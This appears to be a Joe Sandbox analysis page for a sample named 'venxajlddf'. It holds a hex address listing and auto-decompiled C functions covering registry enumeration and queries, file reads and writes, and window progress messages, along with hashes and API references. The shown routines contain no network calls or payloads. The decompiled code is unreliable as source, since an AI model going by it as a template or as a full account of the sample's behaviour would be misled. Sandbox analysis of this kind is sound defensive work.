0x00406e57
0x00406e5a
0x00406e5d
0x00406e60
0x00406e63
0x00406e7f
0x00406e82
0x00406e85
0x00406e88
0x00406e8f
0x00406e93
0x00406e95
0x00406e99
0x00406e65
0x00406e65
0x00406e69
0x00406e71
0x00406e76
0x00406e78
0x00406e7a
0x00406e7a
0x00406e9c
0x00406ea3
0x00406ea6
0x00000000
0x00406eac
0x00000000
0x00406eac
0x00000000
0x00406eb1
0x00406eb1
0x00406eb5
0x00407575
0x00000000
0x00407575
0x00406ebb
0x00406ebe
0x00406ec1
0x00406ec5
0x00406ec8
0x00406ece
0x00406ed0
0x00406ed0
0x00406ed0
0x00406ed3
0x00406ed6
0x00406ed6
0x00406ed6
0x00406edc
0x00000000
0x00000000
0x00406ede
0x00406ee1
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406ef0
0x00406ef3
0x00406ef6
0x00406ef9
0x00406efc
0x00406f14
0x00406f17
0x00406f1a
0x00406f1d
0x00406f1d
0x00406f20
0x00406f24
0x00406f26
0x00406efe
0x00406efe
0x00406f06
0x00406f0b
0x00406f0d
0x00406f0f
0x00406f0f
0x00406f29
0x00406f30
0x00406f33
0x00000000
0x00406f35
0x00000000
0x00406f35
0x00406f33
0x00406f3a
0x00406f3a
0x00406f3a
0x00406f3a
0x00000000
0x00000000
0x00406f75
0x00406f75
0x00406f79
0x00407581
0x00000000
0x00407581
0x00406f7f
0x00406f82
0x00406f85
0x00406f89
0x00406f8c
0x00406f92
0x00406f94
0x00406f94
0x00406f94
0x00406f97
0x00406f9a
0x00406f9a
0x00406fa0
0x00406f3e
0x00406f3e
0x00406f41
0x00000000
0x00406f41
0x00406fa2
0x00406fa2
0x00406fa5
0x00406fa8
0x00406fab
0x00406fae
0x00406fb1
0x00406fb4
0x00406fb7
0x00406fba
0x00406fbd
0x00406fc0
0x00406fd8
0x00406fdb
0x00406fde
0x00406fe1
0x00406fe1
0x00406fe4
0x00406fe8
0x00406fea
0x00406fc2
0x00406fc2
0x00406fca
0x00406fcf
0x00406fd1
0x00406fd3
0x00406fd3
0x00406fed
0x00406ff4
0x00406ff7
0x00000000
0x00406ff9
0x00000000
0x00406ff9
0x00000000
0x00407286
0x00407286
0x0040728a
0x004075b1
0x00000000
0x004075b1
0x00407290
0x00407293
0x00407296
0x0040729a
0x0040729d
0x004072a3
0x004072a5
0x004072a5
0x004072a5
0x004072a8
0x00000000
0x00000000
0x00407056
0x00407056
0x00407059
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x00000000
0x00407395
0x00407399
0x004073bb
0x004073be
0x004073c8
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x004073cb
0x0040739b
0x0040739e
0x004073a2
0x004073a5
0x004073a5
0x004073a8
0x00000000
0x00000000
0x00407452
0x00407456
0x00407474
0x00407474
0x00407474
0x0040747b
0x00407482
0x00407489
0x00407489
0x00000000
0x00407489
0x00407458
0x0040745b
0x0040745e
0x00407461
0x00407468
0x004073ac
0x004073ac
0x004073af
0x00000000
0x00000000
0x00407543
0x00407546
0x00407447
0x00000000
0x00000000
0x0040717d
0x0040717f
0x00407186
0x00407187
0x00407189
0x0040718c
0x00000000
0x00000000
0x00407194
0x00407197
0x0040719a
0x0040719c
0x0040719e
0x0040719e
0x0040719f
0x004071a2
0x004071a9
0x004071ac
0x004071ba
0x00000000
0x00000000
0x00407490
0x00407490
0x00407493
0x0040749a
0x00000000
0x00000000
0x0040749f
0x0040749f
0x004074a3
0x004075db
0x00000000
0x004075db
0x004074a9
0x004074ac
0x004074af
0x004074b3
0x004074b6
0x004074bc
0x004074be
0x004074be
0x004074be
0x004074c1
0x004074c4
0x004074c4
0x004074c4
0x004074c4
0x004074c7
0x004074c7
0x004074cb
0x0040752b
0x0040752e
0x00407533
0x00407534
0x00407536
0x00407538
0x0040753b
0x00407447
0x00407447
0x00000000
0x0040744d
0x00407447
0x004074cd
0x004074d3
0x004074d6
0x004074d9
0x004074dc
0x004074df
0x004074e2
0x004074e5
0x004074e8
0x004074eb
0x004074ee
0x00407507
0x0040750a
0x0040750d
0x00407510
0x00407514
0x00407516
0x00407516
0x00407517
0x0040751a
0x004074f0
0x004074f0
0x004074f8
0x004074fd
0x004074ff
0x00407502
0x00407502
0x0040751d
0x00407524
0x00000000
0x00407526
0x00000000
0x00407526
0x00000000
0x004071c2
0x004071c5
0x004071fb
0x0040732b
0x0040732b
0x0040732b
0x0040732b
0x0040732e
0x0040732e
0x00407331
0x00407333
0x004075bd
0x00000000
0x004075bd
0x00407339
0x0040733c
0x00000000
0x00000000
0x00407342
0x00407346
0x00407349
0x00407349
0x00407349
0x00000000
0x00407349
0x004071c7
0x004071c9
0x004071cb
0x004071cd
0x004071d0
0x004071d1
0x004071d3
0x004071d5
0x004071d8
0x004071db
0x004071f1
0x004071f6
0x0040722e
0x0040722e
0x00407232
0x0040725e
0x00407260
0x00407267
0x0040726a
0x0040726d
0x0040726d
0x00407272
0x00407272
0x00407274
0x00407277
0x0040727e
0x00407281
0x004072ae
0x004072ae
0x004072b1
0x004072b4
0x00407328
0x00407328
0x00407328
0x00000000
0x00407328
0x004072b6
0x004072bc
0x004072bf
0x004072c2
0x004072c5
0x004072c8
0x004072cb
0x004072ce
0x004072d1
0x004072d4
0x004072d7
0x004072f0
0x004072f2
0x004072f5
0x004072f6
0x004072f9
0x004072fb
0x004072fe
0x00407300
0x00407302
0x00407305
0x00407307
0x0040730a
0x0040730e
0x00407310
0x00407310
0x00407311
0x00407314
0x00407317
0x004072d9
0x004072d9
0x004072e1
0x004072e6
0x004072e8
0x004072eb
0x004072eb
0x0040731a
0x00407321
0x004072ab
0x004072ab
0x004072ab
0x004072ab
0x00000000
0x00407323
0x00000000
0x00407323
0x00407321
0x00407234
0x00407237
0x00407239
0x0040723c
0x0040723f
0x00407242
0x00407244
0x00407247
0x0040724a
0x0040724a
0x0040724d
0x0040724d
0x00407250
0x00407257
0x0040722b
0x0040722b
0x0040722b
0x0040722b
0x00000000
0x00407259
0x00000000
0x00407259
0x00407257
0x004071dd
0x004071e0
0x004071e2
0x004071e5
0x00000000
0x00000000
0x00406f44
0x00406f44
0x00406f48
0x0040758d
0x00000000
0x0040758d
0x00406f4e
0x00406f51
0x00406f54
0x00406f57
0x00406f5a
0x00406f5d
0x00406f60
0x00406f62
0x00406f65
0x00406f68
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x00000000
0x00000000
0x004070cf
0x004070cf
0x004070d3
0x00407599
0x00000000
0x00407599
0x004070d9
0x004070dc
0x004070df
0x004070e2
0x004070e4
0x004070e4
0x004070e4
0x004070e7
0x004070ea
0x004070ed
0x004070f0
0x004070f3
0x004070f6
0x004070f7
0x004070f9
0x004070f9
0x004070f9
0x004070fc
0x004070ff
0x00407102
0x00407105
0x00407105
0x00407105
0x00407108
0x0040710a
0x0040710a
0x00000000
0x00000000
0x0040734c
0x0040734c
0x0040734c
0x00407350
0x00000000
0x00000000
0x00407356
0x00407359
0x0040735c
0x0040735f
0x00407361
0x00407361
0x00407361
0x00407364
0x00407367
0x0040736a
0x0040736d
0x00407370
0x00407373
0x00407374
0x00407376
0x00407376
0x00407376
0x00407379
0x0040737c
0x0040737f
0x00407382
0x00407385
0x00407389
0x0040738b
0x0040738e
0x00000000
0x00407390
0x0040710d
0x0040710d
0x00000000
0x0040710d
0x0040738e
0x004075c3
0x00000000
0x00000000
0x00406bf2
0x004075fa
0x004075fa
0x00000000
0x004075fa
0x00407447
0x004073ce
0x004073cb

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
Instruction ID: 947ff9f4813c08031b822263453b6bbc7859602ae013fffc9a74d3363ad91bbb
Opcode Fuzzy Hash: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
Instruction Fuzzy Hash: FE713471E04228DBEF28CF98C8547ADBBB1FF44305F15806AD856BB281C778A986DF45

Uniqueness

Uniqueness Score: -1.00%

Function 0040259E Relevance: 4.5, APIs: 3, Instructions: 47
registryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040259E(int* __ebx, intOrPtr __edx, short* __edi) {
				void* _t9;
				int _t10;
				long _t13;
				int* _t16;
				intOrPtr _t21;
				short* _t22;
				void* _t24;
				void* _t26;
				void* _t29;

				_t22 = __edi;
				_t21 = __edx;
				_t16 = __ebx;
				_t9 = E00402DE6(_t29, 0x20019); // executed
				_t24 = _t9;
				_t10 = E00402D84(3);
				 *((intOrPtr*)(_t26 - 0x10)) = _t21;
				 *__edi = __ebx;
				if(_t24 == __ebx) {
					 *((intOrPtr*)(_t26 - 4)) = 1;
				} else {
					 *(_t26 + 8) = 0x3ff;
					if( *((intOrPtr*)(_t26 - 0x20)) == __ebx) {
						_t13 = RegEnumValueW(_t24, _t10, __edi, _t26 + 8, __ebx, __ebx, __ebx, __ebx); // executed
						__eflags = _t13;
						if(_t13 != 0) {
							 *((intOrPtr*)(_t26 - 4)) = 1;
						}
					} else {
						RegEnumKeyW(_t24, _t10, __edi, 0x3ff); // executed
					}
					_t22[0x3ff] = _t16;
					_push(_t24); // executed
					RegCloseKey(); // executed
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t26 - 4));
				return 0;
			}

0x0040259e
0x0040259e
0x0040259e
0x004025a3
0x004025aa
0x004025ac
0x004025b4
0x004025b7
0x004025ba
0x0040292e
0x004025c0
0x004025c8
0x004025cb
0x004025e4
0x004025ea
0x004025ec
0x004025ee
0x004025ee
0x004025cd
0x004025d1
0x004025d1
0x004025f5
0x004025fc
0x004025fd
0x004025fd
0x00402c2d
0x00402c39

APIs

RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D1
RegEnumValueW.KERNEL32(00000000,00000000,?,?), ref: 004025E4
RegCloseKey.KERNEL32(?), ref: 004025FD

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: Enum$CloseValue
String ID:
API String ID: 397863658-0
Opcode ID: e8b09821373b1692f20764f64567a9709107b9d1653e5a45d9dc4388860ff9c6
Instruction ID: fdd171a53236be04b49e80cc8c25aaf428e2db1c32e81cf7e645575326a8d696
Opcode Fuzzy Hash: e8b09821373b1692f20764f64567a9709107b9d1653e5a45d9dc4388860ff9c6
Instruction Fuzzy Hash: 35017CB1A04105ABEB159F94DE58AAEB66CEF40348F10403AF501B61D0EBB85E45966D

Uniqueness

Uniqueness Score: -1.00%

Function 0040620A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040620A(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x0040620e
0x0040621e
0x00406226
0x00000000
0x0040622d
0x00000000
0x0040622f

APIs

WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000), ref: 0040621E

Strings

printf, xrefs: 0040620A

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: FileWrite
String ID: printf
API String ID: 3934441357-3524737521
Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction ID: 398385dbb58ca0a44fa402a726e0ab0b2131cea3ae709c8a1b666252059dd88a
Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction Fuzzy Hash: F6E08632141129EBCF10AE548C00EEB375CFB01350F014476F955E3040D330E93087A5

Uniqueness

Uniqueness Score: -1.00%

Function 004061DB Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004061DB(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x004061df
0x004061ef
0x004061f7
0x00000000
0x004061fe
0x00000000
0x00406200

APIs

ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000), ref: 004061EF

Strings

printf, xrefs: 004061DB

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: FileRead
String ID: printf
API String ID: 2738559852-3524737521
Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction ID: 689b8facb1381159ac92aeccc4703b7db47ce2620db9a14c340ec3ef8a35c8b1
Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction Fuzzy Hash: C1E0863250021AABDF10AE518C04AEB375CEB01360F014477F922E2150D230E82187E8

Uniqueness

Uniqueness Score: -1.00%

Function 004064D5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004064D5(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E00406454(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegOpenKeyExW(_t7, _a8, 0, _a12, _a16); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}

0x004064df
0x004064e6
0x004064f9
0x00000000
0x004064f9
0x004064ea
0x00000000

APIs

RegOpenKeyExW.KERNEL32 ref: 004064F9

Strings

('B, xrefs: 004064D5

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: Open
String ID: ('B
API String ID: 71445658-2332581011
Opcode ID: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
Instruction ID: 5036765eb4ab6e58186d81024f5778724aa2024cd81e2e1d5ca813995cf5404a
Opcode Fuzzy Hash: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
Instruction Fuzzy Hash: BAD0123210020DBBDF115F90AD01FAB375DAB08310F018426FE06A4092D775D534A728

Uniqueness

Uniqueness Score: -1.00%

Function 00403371 Relevance: 3.1, APIs: 2, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00403371(void* __ecx, long _a4, void* _a8, void* _a12, long _a16) {
				long _v8;
				long _t21;
				long _t22;
				void* _t24;
				long _t26;
				int _t27;
				long _t28;
				void* _t29;
				void* _t30;
				long _t31;
				long _t32;
				long _t36;

				_t21 = _a4;
				if(_t21 >= 0) {
					_t32 = _t21 +  *0x42a2b8;
					 *0x420ef4 = _t32;
					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
				}
				_t22 = E00403479(4);
				if(_t22 >= 0) {
					_t24 = E004061DB( *0x40a01c,  &_a4, 4); // executed
					if(_t24 == 0) {
						L18:
						_push(0xfffffffd);
						goto L19;
					} else {
						 *0x420ef4 =  *0x420ef4 + 4;
						_t36 = E00403479(_a4);
						if(_t36 < 0) {
							L21:
							_t22 = _t36;
						} else {
							if(_a12 != 0) {
								_t26 = _a4;
								if(_t26 >= _a16) {
									_t26 = _a16;
								}
								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
								if(_t27 != 0) {
									_t36 = _v8;
									 *0x420ef4 =  *0x420ef4 + _t36;
									goto L21;
								} else {
									goto L18;
								}
							} else {
								if(_a4 <= 0) {
									goto L21;
								} else {
									while(1) {
										_t28 = _a4;
										if(_a4 >= 0x4000) {
											_t28 = 0x4000;
										}
										_v8 = _t28;
										_t29 = E004061DB( *0x40a01c, 0x414ef0, _t28); // executed
										if(_t29 == 0) {
											goto L18;
										}
										_t30 = E0040620A(_a8, 0x414ef0, _v8); // executed
										if(_t30 == 0) {
											_push(0xfffffffe);
											L19:
											_pop(_t22);
										} else {
											_t31 = _v8;
											_a4 = _a4 - _t31;
											 *0x420ef4 =  *0x420ef4 + _t31;
											_t36 = _t36 + _t31;
											if(_a4 > 0) {
												continue;
											} else {
												goto L21;
											}
										}
										goto L22;
									}
									goto L18;
								}
							}
						}
					}
				}
				L22:
				return _t22;
			}

0x00403375
0x0040337e
0x00403387
0x0040338b
0x00403396
0x00403396
0x0040339e
0x004033a5
0x004033b7
0x004033be
0x00403463
0x00403463
0x00000000
0x004033c4
0x004033c7
0x004033d3
0x004033d7
0x00403471
0x00403471
0x004033dd
0x004033e0
0x0040343f
0x00403445
0x00403447
0x00403447
0x00403459
0x00403461
0x00403468
0x0040346b
0x00000000
0x00000000
0x00000000
0x00000000
0x004033e2
0x004033e5
0x00000000
0x004033eb
0x004033f0
0x004033f7
0x004033fa
0x004033fc
0x004033fc
0x00403409
0x0040340c
0x00403413
0x00000000
0x00000000
0x0040341c
0x00403423
0x0040343b
0x00403465
0x00403465
0x00403425
0x00403425
0x00403428
0x0040342b
0x00403431
0x00403437
0x00000000
0x00403439
0x00000000
0x00403439
0x00403437
0x00000000
0x00403423
0x00000000
0x004033f0
0x004033e5
0x004033e0
0x004033d7
0x004033be
0x00403473
0x00403476

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 00403396

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
Instruction ID: 963a71f16df831595788c30304fa9cedbf2cad19eb63879c1ada4fe15c9ed8fa
Opcode Fuzzy Hash: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
Instruction Fuzzy Hash: 93319F70200219EFDB129F65ED84E9A3FA8FF00355B10443AF905EA1A1D778CE51DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040252A Relevance: 3.1, APIs: 2, Instructions: 56
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040252A(int* __ebx, char* __edi) {
				void* _t17;
				short* _t18;
				void* _t35;
				void* _t37;
				void* _t40;

				_t33 = __edi;
				_t27 = __ebx;
				_t17 = E00402DE6(_t40, 0x20019); // executed
				_t35 = _t17;
				_t18 = E00402DA6(0x33);
				 *__edi = __ebx;
				if(_t35 == __ebx) {
					 *(_t37 - 4) = 1;
				} else {
					 *(_t37 - 0x10) = 0x800;
					if(RegQueryValueExW(_t35, _t18, __ebx, _t37 + 8, __edi, _t37 - 0x10) != 0) {
						L7:
						 *_t33 = _t27;
						 *(_t37 - 4) = 1;
					} else {
						if( *(_t37 + 8) == 4) {
							__eflags =  *(_t37 - 0x20) - __ebx;
							 *(_t37 - 4) = 0 |  *(_t37 - 0x20) == __ebx;
							E004065AF(__edi,  *__edi);
						} else {
							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
								 *(_t37 - 4) =  *(_t37 - 0x20);
								_t33[0x7fe] = _t27;
							} else {
								goto L7;
							}
						}
					}
					_push(_t35); // executed
					RegCloseKey(); // executed
				}
				 *0x42a2e8 =  *0x42a2e8 +  *(_t37 - 4);
				return 0;
			}

0x0040252a
0x0040252a
0x0040252f
0x00402536
0x00402538
0x0040253f
0x00402542
0x0040292e
0x00402548
0x0040254b
0x00402566
0x00402596
0x00402596
0x00402599
0x00402568
0x0040256c
0x00402585
0x0040258c
0x0040258f
0x0040256e
0x00402571
0x0040257c
0x004025f5
0x00000000
0x00000000
0x00000000
0x00402571
0x0040256c
0x004025fc
0x004025fd
0x004025fd
0x00402c2d
0x00402c39

APIs

RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 0040255B
RegCloseKey.KERNEL32(?), ref: 004025FD

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: dd0599e4b52b61a1ac7a58c04e418f58fda78ccec35c85f03be81c2e2baa07e3
Instruction ID: eaee0c709954dca67eb2d1c59e66f6ca2c08a593dad46a4828cc6951ae7b5872
Opcode Fuzzy Hash: dd0599e4b52b61a1ac7a58c04e418f58fda78ccec35c85f03be81c2e2baa07e3
Instruction Fuzzy Hash: 5C116D71900219EBDF14DFA4DE589AE7774FF04345B20443BE401B62D0E7B88A45EB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401389(signed int _a4, struct HWND__* _a10) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42a290;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if(_a10 != 0) {
						 *0x42924c =  *0x42924c + _t12;
						SendMessageW(_a10, 0x402, MulDiv( *0x42924c, 0x7530,  *0x429234), 0); // executed
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32 ref: 004013E4
SendMessageW.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: MessageSend
String ID:
